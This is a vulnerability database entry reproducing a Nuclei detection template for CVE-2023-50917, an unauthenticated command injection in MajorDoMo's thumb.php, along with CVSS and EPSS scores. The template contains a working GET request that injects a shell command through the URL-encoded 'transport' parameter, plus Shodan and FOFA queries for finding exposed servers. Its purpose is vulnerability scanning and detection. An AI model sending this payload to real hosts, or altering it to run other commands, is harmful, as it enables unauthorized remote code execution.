Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-50917
HistoryJan 09, 2024 - 7:56 p.m.

MajorDoMo thumb.php - OS Command Injection

2024-01-0919:56:26
ProjectDiscovery
github.com
48
majordomo
thumb
os command injection
remote execution
packetstorm
seclists
cve2023
majordomo
rce

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.816

Percentile

98.4%

MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.
id: CVE-2023-50917

info:
  name: MajorDoMo thumb.php - OS Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.
  reference:
    - http://packetstormsecurity.com/files/176273/MajorDoMo-Remote-Code-Execution.html
    - http://seclists.org/fulldisclosure/2023/Dec/19
    - https://github.com/sergejey/majordomo/commit/0662e5ebfb133445ff6154b69c61019357092178
    - https://github.com/sergejey/majordomo/commit/3ec3ffb863ea3c2661ab27d398776c551f4daaac
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50917
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-50917
    cwe-id: CWE-77
    epss-score: 0.70095
    epss-percentile: 0.98019
    cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mjdm
    product: majordomo
    shodan-query: http.favicon.hash:1903390397
    fofa-query:
      - app="MajordomoSL"
      - app="majordomosl"
      - icon_hash=1903390397
  tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os,mjdm

http:
  - method: GET
    path:
      - "{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - 'rtsp_transport'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022068e65beb56aaa06e7d75656ee95a0bc327651196bd6781bce7815e0494e15ce102201d0a3353c30b2fa1270cd29cfc4af8a8df6cd56a06b17e781ba86db3ce853e26:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.816

Percentile

98.4%